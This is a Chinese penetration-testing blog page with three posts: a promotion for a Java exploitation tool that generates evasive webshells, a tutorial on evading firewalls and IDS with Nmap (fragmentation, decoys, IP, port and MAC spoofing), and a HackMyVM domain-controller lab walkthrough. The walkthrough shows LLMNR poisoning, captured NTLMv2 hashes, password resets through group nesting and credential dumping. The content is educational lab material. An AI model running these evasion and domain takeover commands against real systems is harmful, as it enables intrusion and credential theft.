首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,866 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
67
篇与
的结果
2025-11-10
【Java漏洞综合利用工具】Hyacinth v2.1
Hyacinth 这工具,本质是把 Java 生态里的高频漏洞检测、利用能力做了聚合封装。核心覆盖 Struts2、Fastjson、Weblogic、Shiro、Log4j、Jboss、SpringCloud 这些老熟人的漏洞,不管是探测还是实际利用,模块都直接集成好,不用再零散找工具拼流程。额外加了免杀 webshell 生成和一批实用辅助功能,省得再单独开别的终端敲命令。下载地址:https://pan.baidu.com/s/1YymBOQsD_9X6FeNkxMiH7w 提取码: gy2i
2025年11月10日
2,502 阅读
2 评论
1 点赞
2025-11-06
Nmap防火墙绕过技巧详解
防火墙与入侵检测系统(IDS)的核心工作逻辑,是依托规则匹配机制甄别并拦截异常扫描流量,比如识别 Nmap 标准探测包特征、单一源 IP 高频请求等行为。以下四类 Nmap 防火墙绕过技巧,核心思路在于利用设备规则漏洞,包括数据包片段重组缺陷、IP / 端口信任策略、流量特征识别盲区等,实现隐蔽扫描操作。所有操作均需获取 root 权限以构造自定义数据包,且必须在合法授权范围内执行。因缺乏实体防火墙设备,本文以本地靶机为测试环境展开演示,重点记录各类绕过技术的核心逻辑与操作方法。1 报文分段绕过1.1 技术原理多数防火墙与 IDS 设备会对完整的 TCP 或 UDP 数据包特征进行检测,比如 Nmap 默认探测包的标志位、数据长度等。Nmap 的-f参数可将扫描数据包拆分为小型片段,默认按 MTU 576 字节拆分后,每个片段仅 16 字节左右。部分老旧防火墙与 IDS 不具备数据包重组能力,拆分后的扫描流量难以被其识别,进而实现对拦截机制的规避。1.2 实操命令假设目标主机 10.10.10.178 的 80 端口已被防火墙过滤,可通过分段 + SYN 扫描精准探测该端口状态,命令如下:Nmap -f -sS 10.10.10.178 -p 80 # 分段+SYN扫描,重点探测80端口 执行结果示例结果解读未启用-f参数时,80 端口通常会显示为filtered状态,即无有效响应;启用分段功能后,拆分后的数据包可绕过防火墙检测,目标主机的响应会使端口状态变为open|filtered,后续可通过补充探测验证端口是否真正开放。1.3 适用场景适用:该技巧对不支持数据包重组功能的老旧防火墙效果显著,典型代表如部分企业仍在使用的旧版 Cisco ASA 设备。注意:现代主流防火墙(如 Palo Alto、华为 USG)均具备完善的数据包重组能力,该技术大概率失效。数据包拆分后会增加传输耗时,扫描速度明显变慢,可搭配-T4参数优化效率,命令为sudo Nmap -f -T4 -sS 10.10.10.178。2 自定义最大传输单元2.1 技术原理MTU(最大传输单元)指网络中可传输的单个数据包最大长度,以太网环境默认 MTU 值为 1500 字节。防火墙常针对标准 MTU 尺寸的数据包制定严格检测规则,Nmap 的--mtu参数可自定义数据包 MTU 值(需为 8 的倍数,常见可选值如 1480、1472 等)。通过发送非标准 MTU 尺寸的数据包,可避开防火墙针对标准流量的拦截策略,本质是报文分段技术的灵活进阶版本。2.2 实操命令若目标主机 10.10.10.178 的 443 端口被防火墙基于 MTU 1500 的规则过滤,可自定义 MTU 值进行探测,命令如下:sudo Nmap --mtu 1480 -sS 10.10.10.178 -p 443 # 自定义MTU 1480,扫描443端口 执行结果示例结果解读将 MTU 值设置为非标准的 1480 后,数据包长度脱离防火墙预设检测范围,拦截规则失效,可成功探测到 443 端口的实际开放状态。2.3 适用场景适用场景:当防火墙针对默认 MTU 1500 字节数据包设置专项检测规则,或-f参数的分段效果不佳时,自定义 MTU 是更优选择。注意事项:自定义 MTU 值必须严格遵循 8 的倍数规则(如 1480=8×185、1472=8×184),否则命令会直接报错无法执行。MTU 最小值建议不低于 64 字节,过小的数据包可能被防火墙判定为无效流量直接丢弃。3 诱饵隐藏扫描3.1 技术原理防火墙的核心检测逻辑之一是识别单一源 IP 的高频请求行为,以此判定扫描攻击。Nmap 的-D参数可生成多个虚拟诱饵 IP,这些 IP 可随机生成或手动指定固定地址,与真实扫描 IP 同步发送探测数据包。目标主机的日志会记录多个 IP 的并发请求,防火墙无法精准区分真实扫描源,从而实现真实 IP 的隐藏,避免被纳入黑名单。3.2 实操命令对目标主机 10.10.10.178 进行扫描时,可配置 3 个随机诱饵 IP 与 1 个内网网关固定诱饵 IP(10.10.10.1),命令如下:sudo Nmap -D RND:3,10.10.10.1 -sS 10.10.10.178 # 3个随机诱饵+1个固定诱饵 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 09:50 CST Nmap scan report for 10.10.10.178 Host is up (0.00068s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键:目标防火墙日志会记录以下IP的请求,无法定位真实扫描端 # 诱饵IP:10.10.10.1(固定)、10.10.10.56(随机)、10.10.10.123(随机)、10.10.10.201(随机) # 真实IP:未单独记录,混在诱饵中 Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds 结果解读扫描执行后,目标防火墙日志会同时记录多个 IP 的访问请求,包括固定诱饵 IP 10.10.10.1、3 个随机生成的诱饵 IP(如 10.10.10.56、10.10.10.123、10.10.10.201),真实扫描 IP 的请求会混在其中无法区分,有效规避了单一 IP 被拉黑的风险。最终探测结果显示,目标主机 22、80、443 等端口处于开放状态。3.3 适用场景适用场景:该技术适用于公网渗透测试等需要隐藏真实 IP 的场景,尤其适合对远程目标服务器的匿名探测。注意事项:诱饵 IP 需选择可达的有效地址,比如内网网段内的闲置 IP,无效 IP 发送的请求易被防火墙识别为异常扫描。诱饵数量建议控制在 3-5 个,数量过多会大幅增加扫描耗时,数量过少则无法达到有效的隐藏效果。4 源地址欺骗4.1 技术原理部分防火墙会配置 IP 白名单访问控制策略,仅允许特定可信 IP(如内网管理 IP、合作伙伴服务器 IP)访问目标端口。Nmap 的-S参数可将扫描数据包的源 IP 地址伪装为白名单中的可信地址,防火墙验证源 IP 符合信任规则后,会允许请求通过,从而绕过 IP 过滤机制实现扫描。4.2 实操命令假设目标主机 10.10.10.178 的防火墙仅允许内网管理 IP 10.10.10.2 访问 3389 端口,可通过伪装源 IP 进行探测,命令如下:sudo nmap -S 10.10.10.2 -sS 10.10.10.178 -p 3389 # 伪装成10.10.10.2(白名单IP) 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:00 CST Nmap scan report for 10.10.10.178 Host is up (0.00071s latency). PORT STATE SERVICE 3389/tcp open ms-wbt-server # 原本被IP过滤的3389端口,现在显示open(伪装生效) Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds 结果解读源 IP 伪装为白名单中的 10.10.10.2 后,防火墙放行该请求,扫描结果显示 3389 端口(ms-wbt-server 服务)处于开放状态,表明地址欺骗生效,成功绕过了 IP 过滤限制。4.3 适用场景适用场景:适用于已知防火墙 IP 白名单的场景,比如内网渗透测试中已获取管理 IP 信息,需访问被 IP 限制的关键端口时。注意事项:伪装的 IP 地址必须在防火墙白名单范围内,且扫描端与目标主机需保持通信可达,同网段环境下效果最佳,跨网段需依赖路由转发支持。由于目标主机会将响应数据包发送至伪装 IP,而非真实扫描端,可能无法直接接收响应结果,建议搭配-Pn(跳过 ping 检测)和-v(详细模式)确认扫描执行状态。5 源端口欺骗5.1 技术原理防火墙多针对数据包的源端口配置访问控制规则,常见策略是仅允许源端口为 53(DNS 服务)、80(HTTP 服务)、443(HTTPS 服务)等常用业务端口的请求通过,这类端口被默认为正常业务流量。Nmap 的--source-port参数(简写为-g)可手动指定扫描数据包的源端口,通过伪装成防火墙信任的正常业务端口,规避其端口过滤机制,实现扫描流量的放行。5.2 实操命令若目标主机 10.10.10.178 的防火墙仅允许源端口为 53(DNS)的请求访问 80 端口,可通过指定源端口的方式探测,命令如下:sudo nmap -g 53 -sS 10.10.10.178 -p 80 # 指定源端口53(DNS),扫描80端口 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:10 CST Nmap scan report for 10.10.10.178 Host is up (0.00065s latency). PORT STATE SERVICE 80/tcp open http # 原本被源端口过滤的80端口,现在显示open(端口欺骗生效) Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds 结果解读扫描数据包的源端口被伪装为 53 后,防火墙将其判定为 DNS 关联的正常 HTTP 请求,未执行拦截操作。扫描结果显示 80 端口处于 open 状态,表明源端口欺骗成功,有效绕过了防火墙的端口限制规则。5.3 适用场景适用场景:适用于防火墙配置了源端口白名单的环境,尤其当目标端口被限制仅允许常见业务端口访问时,该技术效果显著。注意事项:指定的源端口不能被本地其他服务占用,例如本地已启动 DNS 服务时,端口 53 处于占用状态,执行命令会直接报错。优先选择 53、80、443 等高频使用的业务端口,这类端口被防火墙纳入信任范围的概率更高,欺骗成功率也随之提升。6 附加随机数据6.1 技术原理入侵检测系统(IDS)多依赖 Nmap 标准探测包的固定特征(如固定数据长度、无额外附加数据)识别扫描行为。Nmap 的--data-length参数可在探测包中添加指定字节数的随机数据(如 100 字节),通过改变数据包的原有特征,让 IDS 的特征库无法精准匹配,从而绕过其检测机制。6.2 实操命令对目标主机 10.10.10.178 进行扫描时,可在探测包中附加 100 字节随机数据,命令如下:sudo nmap --data-length 100 -sS 10.10.10.178 # 附加100字节随机数据 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:20 CST Nmap scan report for 10.10.10.178 Host is up (0.00073s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键:IDS未识别到扫描流量(因数据包含100字节随机数据,特征不匹配) # 未用--data-length时,该扫描会被IDS拦截,端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds 结果解读未使用--data-length参数时,扫描流量会因匹配 IDS 中的 Nmap 标准包特征被拦截,端口状态多显示为 filtered;附加 100 字节随机数据后,数据包特征发生改变,与 IDS 预设规则不匹配,未被拦截。最终探测到目标主机 22、80、443 等端口处于开放状态,扫描达到预期效果。6.3 适用场景适用场景:该技术对依赖固定特征库检测的 IDS 效果明显,例如旧版 Snort 等传统入侵检测系统,需模糊扫描流量特征时可优先使用。注意事项:随机数据长度建议控制在 50-200 字节区间,长度过小则难以改变数据包核心特征,过大可能被防火墙判定为异常流量直接丢弃。对基于行为分析的 IDS(如采用机器学习算法的检测系统)效果有限,这类系统不依赖固定特征,而是通过流量行为模式识别异常。7 MAC 地址欺骗7.1 技术原理局域网环境中的防火墙或交换机,部分会基于 MAC 地址配置访问过滤策略,仅允许特定可信设备(如内网打印机、核心服务器)的 MAC 地址访问目标资源。Nmap 的--spoof-mac参数可将扫描数据包的源 MAC 地址伪装为该信任列表中的地址,二层网络设备(如交换机)会将其判定为可信设备的请求,不执行拦截操作,从而实现绕过。该技术仅适用于局域网环境,因 MAC 地址属于二层通信标识,无法跨路由进行传输。7.2 实操命令假设目标主机 10.10.10.178(同局域网内)的交换机仅允许 MAC 地址为00:0C:29:12:34:56(内网打印机)的设备访问,可通过伪装该 MAC 地址扫描,命令如下:sudo nmap --spoof-mac 00:0C:29:12:34:56 -sS 10.10.10.178 # 伪装成打印机MAC 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:30 CST Nmap scan report for 10.10.10.178 Host is up (0.00069s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # 关键:交换机未拦截请求(因源MAC是信任的打印机MAC) # 未伪装时,扫描被交换机MAC过滤,端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds 结果解读源 MAC 地址伪装为信任的打印机地址后,局域网交换机未对扫描请求进行拦截,成功探测到目标主机 22、80 端口处于开放状态。未伪装时,扫描请求会被 MAC 过滤规则阻断,端口状态显示为 filtered,对比可见欺骗效果显著。7.3 适用场景适用场景:主要用于局域网渗透测试,例如内网环境中需绕过交换机的 MAC 白名单限制,访问被管控的目标主机时。注意事项:伪装的 MAC 地址需符合标准格式(如00:0C:29:xx:xx:xx,VMware 虚拟设备默认 MAC 前缀),可通过arp -a命令查看目标网段内的可信设备 MAC 地址。跨路由扫描时该技术完全无效,因为路由转发过程中会将数据包的源 MAC 地址替换为网关设备的 MAC 地址。8 总结Nmap 防火墙绕过技术的核心逻辑,均围绕利用防火墙 / IDS 的规则漏洞展开,通过改变数据包特征、隐藏真实访问源、伪装可信身份等方式,规避拦截机制。不同技术的适用场景与核心要点存在差异,实际应用中需结合目标网络环境(如局域网 / 公网)、设备类型(老旧 / 现代防火墙)、防护规则(IP / 端口 / MAC 白名单)等因素选择合适方案。往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年11月06日
1,419 阅读
0 评论
0 点赞
2025-10-28
HackMyVm-DC03 :中等
13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有,这怎么打?nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了,哈哈哈哈,靶机重启,原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的,还有SMB协议enum4Linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录SMB匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破SMBnxc SMB 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希,具体流程如下: 监听局域网内的 LLMNR 请求:用 Responder(你之前用过的工具)等软件,在攻击机上监听局域网内的 LLMNR 广播; 伪造响应欺骗目标:当目标设备(比如域内的员工电脑)发起 LLMNR 请求(如解析 \\共享打印机名)时,攻击机抢先回复:“我就是你要找的设备,我的 IP 是攻击机 IP”; 骗取哈希值:目标设备相信后,会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接(比如访问共享文件夹),攻击机就能捕获到这个哈希; 破解哈希或直接用哈希登录:拿到哈希后,可通过 hashcat 破解成明文密码,或直接用 “哈希传递(PTH)” 登录其他设备。 13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中,攻击机和目标域内的员工电脑在同一个网段(192.168.215.0/24): 在 Kali 上启动 Responder,开启 LLMNR 监听: 员工在电脑上误输入 \\不存在的共享名(比如 \\file-server),DNS 解析失败,触发 LLMNR 广播; Responder 捕获到这个请求,伪装成 file-server 回复员工电脑; 员工电脑用当前登录用户(比如 SOUPEDECODE\charlie)的 NTLM 哈希,尝试与攻击机建立 SMB 连接; Responder 成功捕获到 charlie 的哈希,你后续就可以用这个哈希进行 PTH 攻击,登录其他域内设备。 responder -I eth0 -wd这里应该是域控靶机的计划任务,所以能拿到hash拿到这个账号的hash,准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000 --- [SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : soupedecode\xkate578 [SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码,查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹,发现user.txt尝试上传,发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户(用于发现这些用户的TGS票据,从而破解密码)13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户 xkate578 进行 “密码暴力破解” 的操作,核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器,使用相同的账号密码爆破smb服务器,全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt 参数 作用 -x 使用简单认证(非 SASL 认证),适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址(这里是域控的 IP)。 -D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN(用户名),即使用 xkate578 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码(xkate578 的密码)。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN(域的根目录),即从整个域范围查询。 "sAMAccountName=xkate578" 过滤条件:只查询 sAMAccountName 为 xkate578 的用户(精准定位自身)。 memberOf 只返回该用户的 memberOf 字段(即所属的组)。 > ldap_result.txt 将结果输出到文件,方便查看。 从结果中可以看到这个用户属于Account Operators 组作用: 创建 / 修改 / 删除普通域用户账号可在域内新增用户(如 testuser)、修改现有用户的属性(如密码、登录脚本、所属组等),但不能修改域管理员(Domain Admins)等高级账号。 管理用户组(非特权组)可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain Admins、Enterprise Admins 等特权组。 重置普通用户密码可强制重置普通域用户的密码(无需知道原密码),例如将 zximena448 的密码改为 hacked123,进而控制该账号。 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限,可获取更多域内账号的属性(如密码过期时间、登录次数等)。 尝试利用net命令和这些凭证,向目标域添加一个用户,然后使用evil-winrm连接的时候,连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢?很明显,之前已经说过了,Account Operators组的用户,可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain Admins、Enterprise Admins 等特权组。再看看管理员组有哪些用户,一个是Operators,一个是Administrator,两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中,有几个关键线索表明 Operators 是自定义组而非 Windows 内置组:Windows 内置操作员组都有特定的前缀: Backup Operators Print Operators Server Operators Account Operators 而这里发现: 组名:Operators(没有前缀) 这不符合 Windows 内置组的命名规范 sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点: sAMAccountName: Operators(没有数字后缀) Windows 内置组通常有特定的 sAMAccountName 格式 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators 另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码: - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户 # 但可以重置这些用户的密码: - 通过组嵌套获得管理员权限的用户 - 属于自定义管理组的用户再不清楚,就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户) xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码(回家重装了靶机,ip变了)net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102 # 或者 [root@Kali] /home/Kali/DC03 ❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎ rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!" rpcclient $> # 然后连接 evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组,那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢?现在试试┌──(root㉿Kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102 ┌──(root㉿Kali)-[~] └─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami soupedecode\administrator 成功修改!都不需要去PTH(哈希传递攻击)了13.11 PTH攻击(hash传递)Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外,还有一个工具也可以看域内组织情况,叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始,先通过 nmap 扫描确定目标为域控制器,开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后,用 kerbrute 枚举到 charlie、administrator 等用户,爆破无果后通过 Responder 进行 LLMNR 投毒,捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578(属 Account Operators 组)的账号管理权限,先创建影子账号并加入远程管理组,成功登录后枚举域内用户,发现自定义组 Operators 隶属于 Domain Admins,且包含用户 fbeth103。重置 fbeth103 密码并登录,利用其间接域管理员权限,成功修改 Administrator 密码,获取域控最高权限,最终找到 root.txt,全程未依赖复杂漏洞,主要通过权限嵌套与凭据复用推进。往期推荐全网首发!HMV全套Windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,Git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月28日
1,056 阅读
0 评论
0 点赞
2025-07-18
